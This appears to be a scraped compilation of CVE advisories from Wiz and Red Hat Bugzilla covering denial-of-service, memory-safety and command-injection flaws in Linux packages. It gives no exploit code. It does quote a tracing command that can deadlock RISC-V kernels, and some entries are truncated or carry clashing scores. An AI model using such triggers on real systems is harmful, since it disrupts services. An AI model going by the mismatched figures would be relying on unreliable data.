## CVE-2025-34458 (CVSS 8.7, HIGH): Linux Debian vulnerability analysis and mitigation
wb2osz/direwolf (Dire Wolf) versions up to and including 1.8, prior to commit 3658a87, contain a reachable assertion vulnerability in the APRS MIC-E decoder function aprs_mic_e() located in src/decode_aprs.c. When processing a specially crafted AX.25 frame containing a MIC-E message with an empty or truncated comment field, the application triggers an unhandled assertion checking for a non-empty comment. This assertion failure causes immediate process termination, allowing a remote, unauthenticated attacker to cause a denial of service by sending malformed APRS traffic.
Source : NVD
Score 8.7
Published December 22, 2025
Severity HIGH
CNA Score 8.7
Affected Technologies
Linux Debian
Linux Fedora
## CVE-2026-35092 (CVSS 7.5, HIGH): Linux Debian vulnerability analysis and mitigation
A flaw was found in Corosync. An integer overflow vulnerability in Corosync's join message sanity validation allows a remote, unauthenticated attacker to send crafted User Datagram Protocol (UDP) packets. This can cause the service to crash, leading to a denial of service. This vulnerability specifically affects Corosync deployments configured to use totemudp/totemudpu mode.
Source : NVD
Score 7.5
Published April 1, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.3
Exploitation Probability (EPSS) 0.1
## CVE-2026-23407 (CVSS 7.8, HIGH): Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix missing bounds check on DEFAULT table in verify_dfa()
The verify_dfa() function only checks DEFAULT_TABLE bounds when the state
is not differentially encoded.
When the verification loop traverses the differential encoding chain,
it reads k = DEFAULT_TABLE[j] and uses k as an array index without
validation. A malformed DFA with DEFAULT_TABLE[j] >= state_count,
therefore, causes both out-of-bounds reads and writes.
[ 57.179855] ==================================================================
[ 57.180549] BUG: KASAN: slab-out-of-bounds in verify_dfa+0x59a/0x660
[ 57.180904] Read of size 4 at addr ffff888100eadec4 by task su/993
## CVE-2026-4015 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
A weakness has been identified in GPAC 26.03-DEV. Affected is the function txtin_process_texml of the file src/filters/load_text.c of the component TeXML File Parser. Executing a manipulation can lead to stack-based buffer overflow. It is possible to launch the attack on the local host. The exploit has been made available to the public and could be used for attacks. This patch is called d29f6f1ada5cc284cdfa783b6f532c7d8bd049a5. Applying a patch is advised to resolve this issue.
Source : NVD
Score 4.8
Published March 12, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
## CVE-2026-5342 (CVSS 5.3, MEDIUM): Linux Debian vulnerability analysis and mitigation
A flaw has been found in LibRaw up to 0.22.0. This affects the function LibRaw::nikon_load_padded_packed_raw of the file src/decoders/decoders_libraw.cpp of the component TIFF/NEF. Executing a manipulation of the argument load_flags/raw_width can lead to out-of-bounds read. It is possible to launch the attack remotely. The exploit has been published and may be used. Upgrading to version 0.22.1 mitigates this issue. This patch is called b8397cd45657b84e88bd1202528d1764265f185c. It is advisable to upgrade the affected component.
Source : NVD
Score 5.5
Published April 2, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA
Wiz
CVE-2026-23344 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-23344: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
crypto: ccp - Fix use-after-free on error path
In the error path of sev_tsm_init_locked(), the code dereferences 't'
after it has been freed with kfree(). The pr_err() statement attempts
to access t->tio_en and t->tio_init_done after the memory has been
released.
Move the pr_err() call before kfree(t) to access the fields while the
memory is still valid.
This issue was reported by the Smatch static analyser.
Source: NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Wiz
CVE-2026-23217 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
## CVE-2026-23217: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
riscv: trace: fix snapshot deadlock with sbi ecall
If sbi_ecall.c's functions are traceable,
echo "__sbi_ecall:snapshot" > /sys/kernel/tracing/set_ftrace_filter
may get the kernel into a deadlock.
(Functions in sbi_ecall.c are excluded from tracing if
CONFIG_RISCV_ALTERNATIVE_EARLY is set.)
__sbi_ecall triggers a snapshot of the ringbuffer. The snapshot code
raises an IPI interrupt, which results in another call to __sbi_ecall
and another snapshot...
All it takes to get into this endless loop is one initial __sbi_ecall.
On RISC-V systems without SSTC extension, the clock events in
timer-riscv.c issue periodic sbi ecalls, making the problem easy
Wiz
CVE-2026-26477 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
## CVE-2026-26477: Echo vulnerability analysis and mitigation
An issue in Dokuwiki v.2025-05-14b 'Librarian' allows a remote attacker to cause a denial of service via the media_upload_xhr() function in the media.php file.
Source: NVD
Score 7.5
Published April 3, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
dokuwiki
Sources
NVD

| Distribution | Severity | Fix status | Added at |
|---|---|---|---|
| Echo | HIGH | No Fix | Apr 05, 2026 |
Wiz
CVE-2026-3650 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-3650: Linux Debian vulnerability analysis and mitigation
A memory leak exists in the Grassroots DICOM library (GDCM). The bug occurs when parsing malformed DICOM files with non-standard VR types in file meta information. The vulnerability leads to vast memory allocations and resource depletion, triggering a denial-of-service condition. A maliciously crafted file can fill the heap in a single read operation without properly releasing it.
Source: NVD
Score 8.7
Published March 26, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.9
Exploitation Probability (EPSS) 0.1
Affected packages and librari
Wiz
CVE-2026-23028 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-23028: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Fix kvm_device leak in kvm_ipi_destroy()
In kvm_ioctl_create_device(), kvm_device has allocated memory;
kvm_device->destroy() seems to be supposed to free its kvm_device
struct, but kvm_ipi_destroy() is not currently doing this, which
would lead to a memory leak.
So, fix it.
Source: NVD
Published January 31, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-oracle-6.8
linux-oracle-5.15
Sou
Wiz
CVE-2025-68266 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
## CVE-2025-68266: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bfs: Reconstruct file type when loading from disk
syzbot is reporting that the S_IFMT bits of inode->i_mode can become bogus when
the S_IFMT bits of the 32-bit "mode" field loaded from disk are corrupted
or when the 32-bit "attributes" field loaded from disk is corrupted.
The documentation says that BFS uses only the lower 9 bits of the "mode" field.
But I can't find an explicit explanation that the unused upper 23 bits
(especially the S_IFMT bits) are initialized with 0.
Therefore, ignore the S_IFMT bits of the "mode" field loaded from disk.
Also, verify that the value of the "attributes" field loaded from disk is
either BFS_VREG or BFS_VDIR (because BFS
Wiz
CVE-2025-6597 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2025-6597: Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/auth/AuthManager.Php.
This issue affects MediaWiki: from * before 1.39.13, 1.42.7, 1.43.2, 1.44.0.
Source: NVD
Published February 2, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD

| Distribution | Fix status | Added at |
|---|---|---|
| Debian 11, 12, 13 | Has Fix | Jul 03, 2025 |
| Debian 14 | Has Fix | Aug 10, 2025 |
| Echo | Has Fix | Nov 18, 2025 |
Wiz
CVE-2023-54065 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2023-54065: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: dsa: realtek: fix out-of-bounds access
The probe function sets priv->chip_data to (void *)priv + sizeof(*priv)
with the expectation that priv has enough trailing space.
However, only realtek-smi actually allocated this chip_data space.
Do likewise in realtek-mdio to fix out-of-bounds accesses.
These accesses likely went unnoticed so far, because of an (unused)
buf[4096] member in struct realtek_priv, which caused kmalloc to
round up the allocated buffer to a big enough size, so nothing of
value was overwritten. With a different allocator (like in the barebox
bootloader port of the driver) or with KASAN, the memory corruption
becomes quickly a
Wiz
CVE-2026-4833 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-4833: Linux Debian vulnerability analysis and mitigation
A weakness has been identified in Orc discount up to 3.0.1.2. This issue affects the function compile of the file markdown.c of the component Markdown Handler. This manipulation causes uncontrolled recursion. The attack is restricted to local execution. The exploit has been made available to the public and could be used for attacks. The project maintainer confirms: "[I]f you feed it an infinitely deep blockquote input it will crash. (...) [T]his is a duplicate of an old bug that I've been working on."
Source: NVD
Score 4.8
Published March 26, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due
Bugzilla
CVE-2026-5663 dcmtk: OS command injection via a crafted DICOM C-STORE request [fedora-all]
bugzilla·2026-04-06·CVSS 6.9
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-5663 DCMTK: OS command injection via a crafted DICOM C-STORE request
bugzilla·2026-04-06·CVSS 6.9
A security flaw has been discovered in OFFIS DCMTK up to 3.7.0. This impacts the function executeOnReception/executeOnEndOfStudy of the file dcmnet/apps/storescp.cc of the component storescp. Performing a manipulation results in OS command injection. Remote exploitation of the attack is possible. The patch is named edbb085e45788dccaf0e64d71534cfca925784b8. Applying the patch is the recommended action to fix this issue.
Bugzilla
CVE-2026-5663 dcmtk: OS command injection via a crafted DICOM C-STORE request [epel-all]
bugzilla·2026-04-06·CVSS 6.9
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Published 2026-04-06